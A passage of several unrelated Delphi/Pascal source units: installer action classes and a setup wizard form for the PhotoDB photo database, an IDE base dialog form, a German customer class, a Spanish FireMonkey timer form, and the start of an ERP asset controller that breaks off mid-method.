CalculateTotalPoints: Int64; override; procedure Execute(Callback: TActionCallback); override; end; TInstallRegistry = class(TInstallAction) private FCallback: TActionCallback; procedure OnInstallRegistryCallBack(Current, Total: Integer; var Terminate: Boolean); public function CalculateTotalPoints: Int64; override; procedure Execute(Callback: TActionCallback); override; end; TInstallShortcuts = class(TInstallAction) function CalculateTotalPoints: Int64; override; procedure Execute(Callback: TActionCallback); override; end; TInstallStillImageHandler = class(TInstallAction) function CalculateTotalPoints: Int64; override; procedure Execute(Callback: TActionCallback); override; end; TInstallRunProgram = class(TInstallAction) function CalculateTotalPoints: Int64; override; procedure Execute(Callback: TActionCallback); override; end; implementation { TInstallFiles } function TInstallFiles.CalculateTotalPoints: Int64; var MS: TMemoryStream; DiskObject: TDiskObject; I: Integer; begin Result := 0; MS := TMemoryStream.Create; try GetRCDATAResourceStream(SetupDataName, MS); for I := 0 to CurrentInstall.Files.Count - 1 do begin DiskObject := CurrentInstall.Files[I]; Inc(Result, GetObjectSize(MS, DiskObject.Name)); end; finally F(MS); end; end; procedure TInstallFiles.Execute(Callback: TActionCallback); var MS: TMemoryStream; I: Integer; DiskObject: TDiskObject; Destination: string; begin FCallBack := Callback; FTotal := CalculateTotalPoints; FCurrentlyDone := 0; CreateDir(CurrentInstall.DestinationPath); MS := TMemoryStream.Create; try GetRCDATAResourceStream(SetupDataName, MS); for I := 0 to CurrentInstall.Files.Count - 1 do begin DiskObject := CurrentInstall.Files[I]; Destination := IncludeTrailingBackslash(ResolveInstallPath(DiskObject.FinalDestination)) + DiskObject.Name; if DiskObject is TFileObject then ExtractFileFromStorage(MS, Destination, InternalCallBack); if DiskObject is TDirectoryObject then ExtractDirectoryFromStorage(MS, Destination, InternalCallBack); Inc(FCurrentlyDone, GetObjectSize(MS, DiskObject.Name)); end; finally F(MS); end; end; procedure TInstallFiles.InternalCallBack(BytesRead, BytesTotal : int64; var Terminate : Boolean); begin FCallBack(Self, FCurrentlyDone + BytesRead, FTotal, Terminate); end; { TInstallShortcuts } function TInstallShortcuts.CalculateTotalPoints: Int64; var I: Integer; DiskObject: TDiskObject; begin Result := 0; for I := 0 to CurrentInstall.Files.Count - 1 do begin DiskObject := CurrentInstall.Files[I]; Inc(Result, DiskObject.ShortCuts.Count * InstallPoints_ShortCut); end; end; procedure TInstallShortcuts.Execute(Callback: TActionCallback); var I, J: Integer; DiskObject: TDiskObject; CurentPosition: Int64; ShortcutPath, ObjectPath: string; begin CurentPosition := 0; for I := 0 to CurrentInstall.Files.Count - 1 do begin DiskObject := CurrentInstall.Files[I]; for J := 0 to DiskObject.ShortCuts.Count - 1 do begin Inc(CurentPosition, InstallPoints_ShortCut); ObjectPath := ResolveInstallPath(IncludeTrailingBackslash(DiskObject.FinalDestination) + DiskObject.Name); ShortcutPath := ResolveInstallPath(DiskObject.ShortCuts[J].Location); if StartsText('http', ShortcutPath) then begin ObjectPath := ChangeFileExt(ObjectPath, '.url'); CreateInternetShortcut(ObjectPath, ShortcutPath); ShortcutPath := ResolveInstallPath(DiskObject.ShortCuts[J].Name); CreateShortcut(ObjectPath, ShortcutPath, TTranslateManager.Instance.TA(ResolveInstallPath(DiskObject.Description), 'SETUP')); Continue; end; CreateShortcut(ObjectPath, ShortcutPath, TTranslateManager.Instance.TA(ResolveInstallPath(DiskObject.Description), 'SETUP')); end; end; end; { TInstallRegistry } function TInstallRegistry.CalculateTotalPoints: Int64; begin Result := 11 * InstallPoints_Registry; end; procedure TInstallRegistry.Execute(Callback: TActionCallback); var FileName: string; begin FCallback := Callback; FileName := IncludeTrailingBackslash(CurrentInstall.DestinationPath) + PhotoDBFileName; RegInstallApplication(FileName, OnInstallRegistryCallBack); end; procedure TInstallRegistry.OnInstallRegistryCallBack(Current, Total: Integer; var Terminate: Boolean); begin FCallback(Self, Current * InstallPoints_Registry, Total * InstallPoints_Registry, Terminate); end; { TInstallRunProgram } function TInstallRunProgram.CalculateTotalPoints: Int64; begin Result := InstallPoints_RunProgram; end; procedure TInstallRunProgram.Execute(Callback: TActionCallback); var Terminate: Boolean; PhotoDBExeFile: string; begin PhotoDBExeFile := IncludeTrailingBackslash(CurrentInstall.DestinationPath) + PhotoDBFileName; RunAsUser(PhotoDBExeFile, ' /start', CurrentInstall.DestinationPath, False); Callback(Self, InstallPoints_RunProgram, InstallPoints_RunProgram, Terminate); end; { TInstallCloseApplication } function TInstallCloseApplication.CalculateTotalPoints: Int64; begin Result := InstallPoints_Close_PhotoDB; end; procedure TInstallCloseApplication.Execute(Callback: TActionCallback); const Timeout = 60000; var WinHandle: HWND; StartTime: Cardinal; begin inherited; WinHandle := FindWindow(nil, PChar(DBID)); if WinHandle <> 0 then begin SendMessage(WinHandle, WM_CLOSE, 0, 0); StartTime := GetTickCount; while(true) do begin if (FindWindow(nil, PChar(DB_ID)) = 0) and (FindWindow(nil, PChar(DB_ID_CLOSING)) = 0) then Break; if (GetTickCount - StartTime) > Timeout then Break; Sleep(100); end; Sleep(1000); end; end; { TInstallFileActions } function TInstallFileActions.CalculateTotalPoints: Int64; var I, J: Integer; DiskObject: TDiskObject; begin Result := 0; for I := 0 to CurrentInstall.Files.Count - 1 do begin DiskObject := CurrentInstall.Files[I]; for J := 0 to DiskObject.Actions.Count - 1 do if DiskObject.Actions[J].Scope = asInstall then Inc(Result, DiskObject.Actions.Count * InstallPoints_FileAction); end; end; procedure TInstallFileActions.Execute(Callback: TActionCallback); var I, J: Integer; DiskObject: TDiskObject; CurentPosition: Int64; ObjectPath: string; StartInfo: TStartupInfo; ProcInfo: TProcessInformation; hReg: TRegistry; FontName, FontsDirectory: string; begin CurentPosition := 0; for I := 0 to CurrentInstall.Files.Count - 1 do begin DiskObject := CurrentInstall.Files[I]; for J := 0 to DiskObject.Actions.Count - 1 do begin if DiskObject.Actions[J].Scope = asInstall then begin Inc(CurentPosition, InstallPoints_ShortCut); ObjectPath := ResolveInstallPath(IncludeTrailingBackslash(DiskObject.FinalDestination) + DiskObject.Name); { fill with known state } FillChar(StartInfo, SizeOf(TStartupInfo), #0); FillChar(ProcInfo, SizeOf(TProcessInformation), #0); try with StartInfo do begin cb := SizeOf(StartInfo); dwFlags := STARTF_USESHOWWINDOW; wShowWindow := SW_NORMAL; end; CreateProcess(nil, PChar('"' + ObjectPath + '"' + ' ' + DiskObject.Actions[J].CommandLine), nil, nil, False, CREATE_DEFAULT_ERROR_MODE or NORMAL_PRIORITY_CLASS, nil, PChar(ExcludeTrailingPathDelimiter(ExtractFileDir(ObjectPath))), StartInfo, ProcInfo); WaitForSingleObject(ProcInfo.hProcess, 30000); finally CloseHandle(ProcInfo.hProcess); CloseHandle(ProcInfo.hThread); end; end; if DiskObject.Actions[J].Scope = asInstallFont then begin FontsDirectory := GetFontsDirectory; ObjectPath := ResolveInstallPath(IncludeTrailingBackslash(DiskObject.FinalDestination) + DiskObject.Name); FontName := DiskObject.Name; CopyFile(PChar(ObjectPath), PChar(FontsDirectory + FontName), False); hReg := TRegistry.Create; try hReg.RootKey := HKEY_LOCAL_MACHINE; hReg.LazyWrite := False; if hReg.OpenKey('Software\Microsoft\Windows NT\CurrentVersion\Fonts', False) then hReg.WriteString(DiskObject.Actions[J].CommandLine, FontName); hReg.CloseKey; finally F(hReg); end; AddFontResource(PChar(FontsDirectory + FontName)); SendNotifyMessage(HWND_BROADCAST, WM_FONTCHANGE, SPI_SETDOUBLECLICKTIME, 0); end; end; end; end; { TInstallStillImageHandler } function TInstallStillImageHandler.CalculateTotalPoints: Int64; begin if IsWindowsXPOnly then Result := InstallPoints_StillImage else Result := 0; end; procedure TInstallStillImageHandler.Execute(Callback: TActionCallback); var PhotoDBExeFile: string; begin if IsWindowsXPOnly then begin PhotoDBExeFile := IncludeTrailingBackslash(CurrentInstall.DestinationPath) + PhotoDBFileName; RegisterStillHandler('Photo Database', PhotoDBExeFile + ' /import'); end; end; end.
unit ideSHBaseDialogFrm; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, ExtCtrls, StdCtrls, AppEvnts, SHDesignIntf, SHOptionsIntf; type TBaseDialogForm = class(TForm, ISHModalForm) pnlOK: TPanel; pnlOKCancelHelp: TPanel; pnlOKCancel: TPanel; Bevel1: TBevel; Bevel2: TBevel; Bevel3: TBevel; Panel4: TPanel; Panel5: TPanel; Panel6: TPanel; btnOK3: TButton; btnCancel2: TButton; btnHelp1: TButton; btnOK2: TButton; btnCancel1: TButton; btnOK1: TButton; bvlLeft: TBevel; bvlTop: TBevel; bvlRight: TBevel; bvlBottom: TBevel; pnlClient: TPanel; ApplicationEvents1: TApplicationEvents; procedure FormCreate(Sender: TObject); procedure ApplicationEvents1Idle(Sender: TObject; var Done: Boolean); procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure FormActivate(Sender: TObject); procedure FormKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); private { Private declarations } FButtonsMode: TButtonsMode; FEnabledOK: Boolean; FCaptionOK: string; FCaptionCancel: string; FCaptionHelp: string; FShowIndent: Boolean; FDesigner: ISHDesigner; FOnBeforeModalClose: TBeforeModalClose; FOnAfterModalClose: TAfterModalClose; FComponentForm: TSHComponentForm; function GetButtonsMode: TButtonsMode; procedure SetButtonsMode(Value: TButtonsMode); function GetEnabledOK: Boolean; procedure SetEnabledOK(Value: Boolean); function GetCaptionOK: string; procedure SetCaptionOK(Value: string); function GetCaptionCancel: string; procedure SetCaptionCancel(Value: string); function GetCaptionHelp: string; procedure SetCaptionHelp(Value: string); function GetShowIndent: Boolean; procedure SetShowIndent(Value: Boolean); function GetModalResultCode: TModalResult; procedure SetModalResultCode(Value: TModalResult); function GetOnBeforeModalClose: TBeforeModalClose; procedure SetOnBeforeModalClose(Value: TBeforeModalClose); function GetOnAfterModalClose: TAfterModalClose; procedure SetOnAfterModalClose(Value: TAfterModalClose); procedure SetComponentForm(Value: TSHComponentForm); protected procedure DoSaveSettings; virtual; procedure DoRestoreSettings; virtual; procedure DoOnIdle; virtual; public { Public declarations } procedure SetFormSize(const H, W: Integer); property ButtonsMode: TButtonsMode read GetButtonsMode write SetButtonsMode; property CaptionOK: string read GetCaptionOK write SetCaptionOK; property CaptionCancel: string read GetCaptionCancel write SetCaptionCancel; property CaptionHelp: string read GetCaptionHelp write SetCaptionHelp; property ShowIndent: Boolean read GetShowIndent write SetShowIndent; property ModalResultCode: TModalResult read GetModalResultCode write SetModalResultCode; property Designer: ISHDesigner read FDesigner; property ComponentForm: TSHComponentForm read FComponentForm write SetComponentForm; property OnBeforeModalClose: TBeforeModalClose read GetOnBeforeModalClose write SetOnBeforeModalClose; property OnAfterModalClose: TAfterModalClose read GetOnAfterModalClose write SetOnAfterModalClose; end; var BaseDialogForm: TBaseDialogForm; implementation uses ideSHConsts, ideSHSysUtils, ideSHSystem; {$R *.dfm} { TBaseDialogForm } function TBaseDialogForm.GetButtonsMode: TButtonsMode; begin Result := FButtonsMode; end; procedure TBaseDialogForm.SetButtonsMode(Value: TButtonsMode); begin FButtonsMode := Value; pnlOK.Visible := FButtonsMode = bmOK; pnlOKCancel.Visible := FButtonsMode = bmOKCancel; pnlOKCancelHelp.Visible := FButtonsMode = bmOKCancelHelp; end; function TBaseDialogForm.GetCaptionOK: string; begin Result := FCaptionOK; end; procedure TBaseDialogForm.SetCaptionOK(Value: string); begin FCaptionOK := Value; btnOK1.Caption := FCaptionOK; btnOK2.Caption := FCaptionOK; btnOK3.Caption := FCaptionOK; end; function TBaseDialogForm.GetEnabledOK: Boolean; begin Result := FEnabledOK; end; procedure TBaseDialogForm.SetEnabledOK(Value: Boolean); begin FEnabledOK := Value; btnOK1.Enabled := FEnabledOK; btnOK2.Enabled := FEnabledOK; btnOK3.Enabled := FEnabledOK; end; function TBaseDialogForm.GetCaptionCancel: string; begin Result := FCaptionCancel; end; procedure TBaseDialogForm.SetCaptionCancel(Value: string); begin FCaptionCancel := Value; btnCancel1.Caption := FCaptionCancel; btnCancel2.Caption := FCaptionCancel; end; function TBaseDialogForm.GetCaptionHelp: string; begin Result := FCaptionHelp; end; procedure TBaseDialogForm.SetCaptionHelp(Value: string); begin FCaptionHelp := Value; btnHelp1.Caption := FCaptionHelp; end; procedure TBaseDialogForm.FormCreate(Sender: TObject); begin AntiLargeFont(Self); BorderIcons := [biSystemMenu]; Position := poScreenCenter; SHSupports(ISHDesigner, FDesigner); DoRestoreSettings; BorderStyle := bsSizeable; pnlClient.Caption := EmptyStr; ButtonsMode := bmOKCancel; CaptionOK := Format('%s', [SCaptionButtonOK]); CaptionCancel := Format('%s', [SCaptionButtonCancel]); CaptionHelp := Format('%s', [SCaptionButtonHelp]); ShowIndent := True; end; procedure TBaseDialogForm.FormClose(Sender: TObject; var Action: TCloseAction); var vModalResult: TModalResult; begin vModalResult := ModalResult; try if Assigned(ComponentForm) and Assigned(FOnBeforeModalClose) then FOnBeforeModalClose(Sender, vModalResult, Action); finally ModalResult := vModalResult; end; DoSaveSettings; end; function TBaseDialogForm.GetShowIndent: Boolean; begin Result := FShowIndent; end; procedure TBaseDialogForm.SetShowIndent(Value: Boolean); begin FShowIndent := Value; bvlLeft.Visible := FShowIndent; bvlTop.Visible := FShowIndent; bvlRight.Visible := FShowIndent; end; function TBaseDialogForm.GetModalResultCode: TModalResult; begin Result := ModalResult; end; procedure TBaseDialogForm.SetModalResultCode(Value: TModalResult); begin ModalResult := Value; end; function TBaseDialogForm.GetOnBeforeModalClose: TBeforeModalClose; begin Result := FOnBeforeModalClose; end; procedure TBaseDialogForm.SetOnBeforeModalClose(Value: TBeforeModalClose); begin FOnBeforeModalClose := Value; end; function TBaseDialogForm.GetOnAfterModalClose: TAfterModalClose; begin Result := FOnAfterModalClose; end; procedure TBaseDialogForm.SetOnAfterModalClose(Value: TAfterModalClose); begin FOnAfterModalClose := Value; end; procedure TBaseDialogForm.SetComponentForm(Value: TSHComponentForm); begin FComponentForm := Value; if Assigned(FComponentForm) then begin Caption := FComponentForm.Caption; DoRestoreSettings; FComponentForm.Show; end; end; procedure TBaseDialogForm.SetFormSize(const H, W: Integer); begin Self.Height := H; Self.Width := W; end; procedure TBaseDialogForm.DoSaveSettings; var TmpList: TStringList; begin TmpList := TStringList.Create; TmpList.Add('Width'); TmpList.Add('Height'); try if Assigned(ComponentForm) then begin ComponentForm.Align := alNone; ComponentForm.Height := Self.Height; ComponentForm.Width := Self.Width; WritePropValuesToFile(GetFilePath(SFileForms), SSectionForms, ComponentForm, TmpList); end else WritePropValuesToFile(GetFilePath(SFileForms), SSectionForms, Self, TmpList); finally TmpList.Free; end; end; procedure TBaseDialogForm.DoRestoreSettings; var TmpList: TStringList; H1, W1, H2, W2: Integer; begin TmpList := TStringList.Create; TmpList.Add('Width'); TmpList.Add('Height'); try if Assigned(ComponentForm) then begin ComponentForm.Align := alNone; H1 := ComponentForm.Height; W1 := ComponentForm.Width; ReadPropValuesFromFile(GetFilePath(SFileForms), SSectionForms, ComponentForm, TmpList); H2 := ComponentForm.Height; W2 := ComponentForm.Width; Self.Width := ComponentForm.Width; if (H1 = H2) and (W1 = W2) then Self.Height := FComponentForm.Height + bvlBottom.Height + pnlOK.Height else Self.Height := ComponentForm.Height; ComponentForm.Align := alClient; end else ReadPropValuesFromFile(GetFilePath(SFileForms), SSectionForms, Self, TmpList); finally TmpList.Free; end; end; procedure TBaseDialogForm.DoOnIdle; begin // Empty end; procedure TBaseDialogForm.ApplicationEvents1Idle(Sender: TObject; var Done: Boolean); begin DoOnIdle; end; procedure TBaseDialogForm.FormActivate(Sender: TObject); begin if Assigned(ComponentForm) then begin FComponentForm.BringToTop; if Assigned(ComponentForm.ActiveControl) and ComponentForm.ActiveControl.CanFocus then FComponentForm.ActiveControl.SetFocus; end; end; procedure TBaseDialogForm.FormKeyDown(Sender: TObject; var Key: Word; Shift: TShiftState); begin if Assigned(ComponentForm) then if (Key = VK_RETURN) and (ssCtrl in Shift) then ModalResult := mrOK; end; end.
unit uFrmMain; interface {$WARN SYMBOL_PLATFORM OFF} uses Winapi.Windows, Winapi.Messages, System.SysUtils, System.Classes, System.ZLib, System.Win.Registry, Vcl.Graphics, Vcl.Controls, Vcl.Forms, Vcl.Dialogs, Vcl.ExtCtrls, Vcl.StdCtrls, Vcl.Imaging.pngimage, Dmitry.Utils.System, Dmitry.Controls.WatermarkedEdit, uDBForm, uInstallTypes, uInstallUtils, uMemory, uConstants, uRuntime, uVistaFuncs, uInstallScope, uShellUtils, uSteps, uDBBaseTypes, {$IFDEF INSTALL} uInstallSteps, uInstallRuntime, {$ENDIF} {$IFDEF UNINSTALL} uUninstallSteps, {$ENDIF} uFrmProgress; type TFrmMain = class(TDBForm) ImMain: TImage; BtnNext: TButton; BtnCancel: TButton; LbWelcome: TLabel; Bevel1: TBevel; BtnInstall: TButton; BtnPrevious: TButton; procedure BtnCancelClick(Sender: TObject); procedure FormCreate(Sender: TObject); procedure BtnInstallClick(Sender: TObject); procedure FormDestroy(Sender: TObject); procedure BtnNextClick(Sender: TObject); procedure BtnPreviousClick(Sender: TObject); private { Private declarations } FrmProgress: TFrmProgress; FInstallType : TInstallSteps; procedure LoadLanguage; procedure LoadMainImage; procedure StepsChanged(Sender: TObject); protected function GetFormID: string; override; public { Public declarations } function UpdateProgress(Position, Total: Int64): Boolean; end; var FrmMain: TFrmMain; implementation {$R *.dfm} uses uInstallThread; { TFrmMain } procedure TFrmMain.BtnCancelClick(Sender: TObject); begin Close; end; procedure TFrmMain.BtnInstallClick(Sender: TObject); {$IFDEF INSTALL} var InstalledVersion: TRelease; {$ENDIF} begin {$IFDEF INSTALL} if IsApplicationInstalled then begin InstalledVersion := GetExeVersion(GetInstalledFileName); if IsNewRelease(InstallVersion, InstalledVersion) then if ID_Yes <> TaskDialog(Handle, Format(L('Newer version (%s) is already installed! Do you want to install old version (%s)?'), [ReleaseToString(InstalledVersion), ReleaseToString(InstallVersion)]), L('Warning'), '', TD_BUTTON_YESNO, TD_ICON_WARNING) then Exit; end; {$ENDIF} FInstallType.PrepaireInstall; Application.CreateForm(TFrmProgress, FrmProgress); Hide; FrmProgress.Show; FrmProgress.Progress := 0; TInstallThread.Create(Self); end; procedure TFrmMain.BtnNextClick(Sender: TObject); begin FInstallType.NextStep; end; procedure TFrmMain.BtnPreviousClick(Sender: TObject); begin FInstallType.PreviousStep; end; procedure TFrmMain.FormCreate(Sender: TObject); var hSemaphore: THandle; begin FrmProgress := nil; hSemaphore := CreateSemaphore( nil, 0, 1, PWideChar(DBID)); if ((hSemaphore <> 0) and (GetLastError = ERROR_ALREADY_EXISTS)) then TaskDialog(Handle, L('Program is started! Install will close the program during installation process!'), L('Warning'), '', TD_BUTTON_OK, TD_ICON_WARNING); LoadMainImage; LoadLanguage; {$IFDEF INSTALL} if IsApplicationInstalled then FInstallType := TUpdatePreviousVersion.Create else FInstallType := TFreshInstall.Create; {$ENDIF} {$IFDEF UNINSTALL} FInstallType := TUninstall_V3_X.Create; {$ENDIF} FInstallType.OnChange := StepsChanged; FInstallType.Start(Self, 190, 5); end; procedure TFrmMain.FormDestroy(Sender: TObject); begin F(FInstallType); end; function TFrmMain.GetFormID: string; begin Result := 'Setup'; end; procedure TFrmMain.LoadLanguage; {$IFDEF INSTALL} var S: string; {$ENDIF} begin BeginTranslate; try {$IFDEF INSTALL} S := L('PhotoDB 4.6 Setup'); if IsApplicationInstalled then S := S + ' (' + L('Update') + ' ' + ReleaseToString(InstallVersion) + ')'; Caption := S; {$ENDIF} {$IFDEF UNINSTALL} Caption := L('PhotoDB 4.6 Uninstall'); {$ENDIF} BtnCancel.Caption := L('Cancel'); BtnNext.Caption := L('Next'); BtnPrevious.Caption := L('Previous'); {$IFDEF INSTALL} BtnInstall.Caption := L('Install'); {$ENDIF} {$IFDEF UNINSTALL} BtnInstall.Caption := L('Uninstall'); {$ENDIF} LbWelcome.Caption := L('Welcome to the Photo Database 4.6'); finally EndTranslate; end; end; procedure TFrmMain.LoadMainImage; var MS: TMemoryStream; Png: TPngImage; begin MS := TMemoryStream.Create; try GetRCDATAResourceStream('Image', MS); Png := TPngImage.Create; try MS.Seek(0, soFromBeginning); Png.LoadFromStream(MS); ImMain.Picture.Graphic := Png; finally F(Png); end; finally F(MS); end; end; procedure TFrmMain.StepsChanged(Sender: TObject); begin BtnNext.Visible := not FInstallType.CanPrevious; BtnNext.Enabled := FInstallType.CanNext; BtnPrevious.Visible := FInstallType.CanPrevious; BtnInstall.Enabled := FInstallType.CanInstall; end; function TFrmMain.UpdateProgress(Position, Total: Int64): Boolean; begin FrmProgress.Progress := Round((Position * 255) / Total); Result := True; end; end.
unit OOPD2_Kunde; interface uses Classes, SysUtils, Controls, oopd2_datensatz, oopd2_adresse; type TAnrede = (Frau, Herr, Dr, Prof, Dipl); TKunde = class(TDatensatz) private iNummer: Integer; sName: String; enumAnrede: TAnrede; dGeburtsdatum: TDateTime; public constructor Create(nummer: Integer; name: String; anrede: TAnrede; geburtstag: TDate); destructor Free; function getKundenNummer: Integer; function formatKundenNummer(kundennummer:Integer): String; function getName: String; function getAnrede: String; function setAnrede(anrede: TAnrede; anredeIndex: Integer): TAnrede; function getAlter: String; function getKundeZuAnschrift(anschrift: TAdresse): String; end; implementation { TKunde } constructor TKunde.Create(nummer: Integer; name: String; anrede: TAnrede; geburtstag: TDate); begin inherited Create; iNummer := nummer; sName := name; enumAnrede := anrede; dGeburtsdatum := geburtstag; end; destructor TKunde.Free; begin end; function TKunde.getKundenNummer: Integer; begin Result := iNummer; end; function TKunde.formatKundenNummer(kundennummer:Integer): String; var sKundenNummer: String; begin sKundenNummer := IntToStr(kundennummer); if length(sKundenNummer) < 2 then sKundenNummer := '000' + sKundenNummer else if length(sKundenNummer) < 3 then sKundenNummer := '00' + sKundenNummer else if length(sKundenNummer) < 4 then sKundenNummer := '0' + sKundenNummer; Result := sKundenNummer end; function TKunde.getName: String; begin Result := sName; end; function TKunde.getAnrede: String; begin case enumAnrede of Frau: Result := 'Frau'; Herr: Result := 'Herr'; Dr: Result := 'Dr.'; Prof: Result := 'Prof.'; Dipl: Result := 'Dipl.'; end; end; function TKunde.setAnrede(anrede: TAnrede; anredeIndex: Integer): TAnrede; begin case anredeIndex of 0: anrede := Frau; 1: anrede := Herr; 2: anrede := Dr; 3: anrede := Prof; 4: anrede := Dipl; end; Result := anrede; end; function TKunde.getAlter: String; begin Result := DateToStr(dGeburtsdatum); end; function TKunde.getKundeZuAnschrift(anschrift: TAdresse): String; begin Result := anschrift.getStrasse; end; end.
unit fSeleccionarContador; interface uses System.SysUtils, System.Types, System.UITypes, System.Classes, System.Variants, FMX.Types, FMX.Controls, FMX.Forms, FMX.Graphics, FMX.Dialogs, FMX.StdCtrls, FMX.Objects, FMX.Controls.Presentation, FMX.Edit, DPF.iOS.BarCodeReader, DPF.iOS.Keyboard, DPF.iOS.SlideDialog, DPF.iOS.UISearchBar, DPF.iOS.BaseControl, DPF.iOS.UIStepper, FMX.EditBox, FMX.ComboTrackBar, FMX.TMSScrollMenu, FMX.TMSBaseControl, FMX.TMSBadge, FMX.TMSTableView, FMX.TMSTableViewEx, FMX.TMSCustomButton, FMX.TMSSpeedButton, FMX.TMSSpinner; type TfrmSeleccionarContador = class(TForm) tbMain: TToolBar; recFondoToolBar: TRectangle; lblTitulo: TLabel; sbtRegresar: TSpeedButton; sbtGuardar: TSpeedButton; edDescripcion: TEdit; Tiempo: TLabel; spi: TTMSFMXSpinner; procedure spiSelectedValueChanged(Sender: TObject; Column: Integer; SelectedValue: Double; RangeType: TTMSFMXSpinnerRangeType); procedure sbtGuardarClick(Sender: TObject); private FSegundos: integer; FMinutos: integer; FHoras: integer; FTotalSegundos: integer; procedure CalcularSegundos; function getDescripcion: string; public constructor Create(AOwner:TComponent); override; destructor Destroy; override; property TotalSegundos:integer read FTotalSegundos; property Horas:integer read FHoras; property Minutos:integer read FMinutos; property Segundos:integer read FSegundos; property Descripcion:string read getDescripcion; end; var frmSeleccionarContador: TfrmSeleccionarContador; implementation {$R *.fmx} { TfrmSeleccionarContador } procedure TfrmSeleccionarContador.CalcularSegundos; var iHoras, iMinutos, iTotal:Integer; begin FHoras := Round(spi.Columns[0].SelectedValue); FMinutos := Round(spi.Columns[1].SelectedValue); FSegundos := Round(spi.Columns[2].SelectedValue); iHoras := FHoras * 60 * 60; iMinutos := FMinutos * 60; iTotal := iHoras + iMinutos + FSegundos; FTotalSegundos := iTotal; {$ifdef debug} lblTitulo.Text := IntToStr(FTotalSegundos); {$endif} end; constructor TfrmSeleccionarContador.Create(AOwner: TComponent); begin inherited Create(AOwner); end; destructor TfrmSeleccionarContador.Destroy; begin inherited Destroy; end; function TfrmSeleccionarContador.getDescripcion: string; begin if edDescripcion.Text.Length = 0 then Result := 'Contador' else Result := edDescripcion.Text; end; procedure TfrmSeleccionarContador.sbtGuardarClick(Sender: TObject); begin CalcularSegundos; if TotalSegundos > 0 then ModalResult := mrOk; end; procedure TfrmSeleccionarContador.spiSelectedValueChanged(Sender: TObject; Column: Integer; SelectedValue: Double; RangeType: TTMSFMXSpinnerRangeType); begin CalcularSegundos; end; end.
{******************************************************************************* Title: T2Ti ERP Description: Controller do lado Cliente relacionado à tabela [PATRIM_BEM] The MIT License Copyright: Copyright (C) 2016 T2Ti.COM Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. The author may be contacted at: t2ti.com@gmail.com @author Albert Eije (t2ti.com@gmail.com) @version 2.0 *******************************************************************************} unit PatrimBemController; {$MODE Delphi} interface uses Classes, Dialogs, SysUtils, DB, LCLIntf, LCLType, LMessages, Forms, Controller, VO, ZDataset, PatrimBemVO; type TPatrimBemController = class(TController) private public class function Consulta(pFiltro: String; pPagina: String): TZQuery; class function ConsultaLista(pFiltro: String): TListaPatrimBemVO; class function ConsultaObjeto(pFiltro: String): TPatrimBemVO; class procedure Insere(pObjeto: TPatrimBemVO); class function Altera(pObjeto: TPatrimBemVO): Boolean; class function Exclui(pId: Integer): Boolean; end; implementation uses UDataModule, T2TiORM, PatrimDocumentoBemVO, PatrimDepreciacaoBemVO, PatrimMovimentacaoBemVO; var ObjetoLocal: TPatrimBemVO; class function TPatrimBemController.Consulta(pFiltro: String; pPagina: String): TZQuery; begin try ObjetoLocal := TPatrimBemVO.Create; Result := TT2TiORM.Consultar(ObjetoLocal, pFiltro, pPagina); finally ObjetoLocal.Free; end; end; class function TPatrimBemController.ConsultaLista(pFiltro: String): TListaPatrimBemVO; begin try ObjetoLocal := TPatrimBemVO.Create; Result := TListaPatrimBemVO(TT2TiORM.Consultar(ObjetoLocal, pFiltro, True)); finally ObjetoLocal.Free; end; end; class function TPatrimBemController.ConsultaObjeto(pFiltro: String): TPatrimBemVO; begin try Result := TPatrimBemVO.Create; Result := TPatrimBemVO(TT2TiORM.ConsultarUmObjeto(Result, pFiltro, True)); Filtro := 'ID_PATRIM_BEM = ' + IntToStr(Result.Id); // Objetos Vinculados // Listas Result.ListaPatrimDocumentoBemVO := TListaPatrimDocumentoBemVO(TT2TiORM.Consultar(TPatrimDocumentoBemVO.Create, Filtro, True)); Result.ListaPatrimDepreciacaoBemVO := TListaPatrimDepreciacaoBemVO(TT2TiORM.Consultar(TPatrimDepreciacaoBemVO.Create, Filtro, True)); Result.ListaPatrimMovimentacaoBemVO := TListaPatrimMovimentacaoBemVO(TT2TiORM.Consultar(TPatrimMovimentacaoBemVO.Create, Filtro, True)); finally end; end; class procedure TPatrimBemController.Insere(pObjeto: TPatrimBemVO); var UltimoID, I: Integer; DocumentoBem: TPatrimDocumentoBemVO; DepreciacaoBem: TPatrimDepreciacaoBemVO; MovimentacaoBem: TPatrimMovimentacaoBemVO; begin try UltimoID := TT2TiORM.Inserir(pObjeto); // Documento for I := 0 to pObjeto.ListaPatrimDocumentoBemVO.Count - 1 do begin DocumentoBem := pObjeto.ListaPatrimDocumentoBemVO[I]; DocumentoBem.IdPatrimBem := UltimoID; TT2TiORM.Inserir(DocumentoBem); end; // Depreciação for I := 0 to pObjeto.ListaPatrimDepreciacaoBemVO.Count - 1 do begin DepreciacaoBem := pObjeto.ListaPatrimDepreciacaoBemVO[I]; DepreciacaoBem.IdPatrimBem := UltimoID; TT2TiORM.Inserir(DepreciacaoBem); end; // Movimentação for I := 0 to pObjeto.ListaPatrimMovimentacaoBemVO.Count - 1 do begin MovimentacaoBem := pObjeto.ListaPatrimMovimentacaoBemVO[I]; MovimentacaoBem.IdPatrimBem := UltimoID; TT2TiORM.Inserir(MovimentacaoBem); end; Consulta('ID = ' + IntToStr(UltimoID), '0'); finally end; end; class function TPatrimBemController.Altera(pObjeto: TPatrimBemVO): Boolean; var UltimoID, I: Integer; DocumentoBem: TPatrimDocumentoBemVO; DepreciacaoBem: TPatrimDepreciacaoBemVO; MovimentacaoBem: TPatrimMovimentacaoBemVO; begin try Result := TT2TiORM.Alterar(pObjeto); // 